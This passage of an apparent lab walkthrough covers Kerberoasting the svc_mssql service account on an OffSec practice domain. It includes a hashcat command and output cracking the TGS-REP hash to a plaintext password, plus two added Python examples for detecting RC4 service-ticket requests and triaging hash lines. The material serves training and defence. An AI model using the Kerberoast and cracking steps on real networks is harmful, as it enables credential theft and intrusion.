Kerberoasting


The adPEAS script identified and exploited a Kerberoast-able user, svc_mssql, which holds the MSSQLSvc/DC.access.offsec SPN. Interestingly, the SPN is registered to the DC.access.offsec host:

dc


PS C:\tmp> ping DC.access.offsec
Ping request could not find host DC.access.offsec. Please check the name and try again.
 
PS C:\tmp> ping dc
 
Pinging dc.local [192.168.206.149] with 32 bytes of data:
Reply from 192.168.206.149: bytes=32 time<1ms TTL=127
Reply from 192.168.206.149: bytes=32 time<1ms TTL=127
Reply from 192.168.206.149: bytes=32 time<1ms TTL=127
Reply from 192.168.206.149: bytes=32 time<1ms TTL=127
 
Ping statistics for 192.168.206.149:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

Pinging DC.access.offsec failed (the name does not resolve), but pinging dc worked and resolved, as dc.local, to a different IP address: 192.168.206.149.
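From the defender's side, the activity above (a service ticket requested for a user-owned SPN, encrypted with RC4 so it can be cracked offline) is what Kerberoasting detection keys on. The following is an added example, not part of the original walkthrough: it runs a simple Kerberoast heuristic over constructed Windows Security event 4769 records (TGS requests). The key=value line format is an assumption about how a SIEM might export the fields; the account and SPN names reuse those from the page.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 records.

Added example (not part of the original walkthrough). Heuristic: a TGS request
(event 4769) for a service principal that is a user account (not a computer
account ending in '$' and not krbtgt), issued with RC4-HMAC (ticket encryption
type 0x17), is the classic signature of a Kerberoast attempt. The sample events
below are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

RC4_HMAC = 0x17  # etype 23, the type hashcat mode 13100 cracks


@dataclass
class TgsRequest:
    account: str    # requesting user (TargetUserName)
    client_ip: str  # IpAddress
    service: str    # ServiceName: the account that owns the requested SPN
    etype: int      # TicketEncryptionType


# Constructed 4769/4768 records in a simplified key=value export format
# (assumption: the SIEM exports these fields; EVTX/XML parsing is out of scope).
SAMPLE_EVENTS = [
    "EventID=4769 Account=alice@ACCESS.OFFSEC ClientIP=192.168.206.50 ServiceName=DC$ TicketEncryptionType=0x12",
    "EventID=4769 Account=alice@ACCESS.OFFSEC ClientIP=192.168.206.50 ServiceName=svc_mssql TicketEncryptionType=0x17",
    "EventID=4769 Account=alice@ACCESS.OFFSEC ClientIP=192.168.206.50 ServiceName=svc_backup TicketEncryptionType=0x17",
    "EventID=4769 Account=bob@ACCESS.OFFSEC ClientIP=192.168.206.51 ServiceName=krbtgt TicketEncryptionType=0x17",
    "EventID=4768 Account=bob@ACCESS.OFFSEC ClientIP=192.168.206.51 ServiceName=krbtgt TicketEncryptionType=0x12",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> Optional[TgsRequest]:
    """Return a TgsRequest for 4769 records, None for any other event."""
    fields = dict(FIELD_RE.findall(line))
    if fields.get("EventID") != "4769":
        return None
    return TgsRequest(
        account=fields["Account"],
        client_ip=fields["ClientIP"],
        service=fields["ServiceName"],
        etype=int(fields["TicketEncryptionType"], 16),
    )


def is_roastable_request(req: TgsRequest) -> bool:
    """RC4 ticket for a user-owned SPN; computer accounts ($) and krbtgt are excluded."""
    if req.etype != RC4_HMAC:
        return False
    if req.service.endswith("$") or req.service.lower() == "krbtgt":
        return False
    return True


def find_kerberoast_candidates(lines, threshold: int = 2) -> Dict[Tuple[str, str], List[str]]:
    """Map (account, client_ip) -> list of service accounts for requesters that
    pulled `threshold` or more RC4 service tickets for user-owned SPNs."""
    hits: Dict[Tuple[str, str], List[str]] = {}
    for line in lines:
        req = parse_event(line)
        if req and is_roastable_request(req):
            hits.setdefault((req.account, req.client_ip), []).append(req.service)
    return {k: v for k, v in hits.items() if len(v) >= threshold}


if __name__ == "__main__":
    for (account, ip), services in find_kerberoast_candidates(SAMPLE_EVENTS).items():
        print(f"{account} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

The threshold is deliberately low for the sample; in production the count of distinct RC4 service tickets per requester within a short window is the tunable, and a single RC4 request from a legacy client is expected noise. Disabling RC4 for service accounts removes the cheap-to-crack case entirely.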

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ hashcat -a 0 -m 13100 ./svc_mssql.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec*$0d542ebf9c13278b89afd3815a2e84e4$...:trustno1
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.ac...01962e
Time.Started.....: Mon Apr 21 17:41:45 2025 (0 secs)
Time.Estimated...: Mon Apr 21 17:41:45 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2349.5 kH/s (1.84ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12288/14344385 (0.09%)
Rejected.........: 0/12288 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> hawkeye
Hardware.Mon.#1..: Util: 10%
 
Started: Mon Apr 21 17:41:44 2025
Stopped: Mon Apr 21 17:41:47 2025

TGS-REP hash cracked: the svc_mssql password is trustno1. The credential still needs to be validated against the target.
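The hashcat line above carries more than the ciphertext: the account, realm, SPN and encryption type are all in clear text, which is what a triage or remediation step actually needs. The following is an added example, not part of the original walkthrough or of hashcat: it destructures the mode-13100 (etype 23) line layout shown above and turns it into remediation findings, including the stale-SPN observation from the ping test. The sample line reuses the page's account, realm, SPN and checksum fields, but its ciphertext is constructed filler, and the set of resolvable hosts passed to triage() is an assumption.

```python
"""Triage a hashcat-format Kerberos TGS-REP hash (mode 13100, etype 23).

Added example, not part of the original walkthrough. Line layout parsed:
  $krb5tgs$23$*<user>$<realm>$<spn>*$<16-byte checksum hex>$<edata2 hex>
The sample line below is constructed: real-looking fields, filler ciphertext.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

ETYPE_NAMES = {23: "RC4-HMAC", 17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96"}

# Layout for etype 23 as emitted by common Kerberoasting tools and read by hashcat -m 13100.
RC4_LINE_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-f]{32})\$(?P<edata2>[0-9a-f]+)$",
    re.IGNORECASE,
)


@dataclass
class TgsHash:
    etype: int
    user: str
    realm: str
    spn: str
    checksum_hex: str
    edata2_hex: str

    @property
    def etype_name(self) -> str:
        return ETYPE_NAMES.get(self.etype, f"etype {self.etype}")

    @property
    def spn_host(self) -> str:
        """Host part of 'service/host[:port]' (e.g. DC.access.offsec)."""
        host = self.spn.split("/", 1)[1] if "/" in self.spn else self.spn
        return host.split(":", 1)[0]


def parse_tgs_hash(line: str) -> Optional[TgsHash]:
    """Parse a mode-13100 line; return None if it is not the etype-23 layout."""
    m = RC4_LINE_RE.match(line.strip())
    if not m:
        return None
    return TgsHash(23, m["user"], m["realm"], m["spn"],
                   m["checksum"].lower(), m["edata2"].lower())


def triage(line: str, resolvable_hosts: Set[str]) -> List[str]:
    """Remediation findings for one hash line; an empty list means nothing parsed."""
    h = parse_tgs_hash(line)
    if h is None:
        return []
    findings = [f"{h.user}@{h.realm} owns SPN {h.spn} ({h.etype_name})"]
    if h.etype == 23:
        # RC4 service tickets crack at wordlist speed offline; AES-only plus a
        # long random (or gMSA-managed) password removes the weak case.
        findings.append("RC4 ticket: restrict the account to AES "
                        "(msDS-SupportedEncryptionTypes) and rotate to a long random or gMSA password")
    if h.spn_host.lower() not in {x.lower() for x in resolvable_hosts}:
        findings.append(f"SPN host {h.spn_host} is not a known/resolvable host; the SPN may be stale")
    return findings


# Constructed sample: fields from the walkthrough, ciphertext is filler.
SAMPLE_LINE = ("$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec*$"
               "0d542ebf9c13278b89afd3815a2e84e4$" + "ab" * 64)

if __name__ == "__main__":
    # Assumption: the only name that resolved in the ping test was dc.local.
    for finding in triage(SAMPLE_LINE, {"dc.local"}):
        print("-", finding)
```

Run against a whole hashcat input file one line at a time; lines for AES tickets (hashcat modes 19600/19700) deliberately return nothing here, since their layout is not the one shown on the page and they are the state you want accounts in anyway.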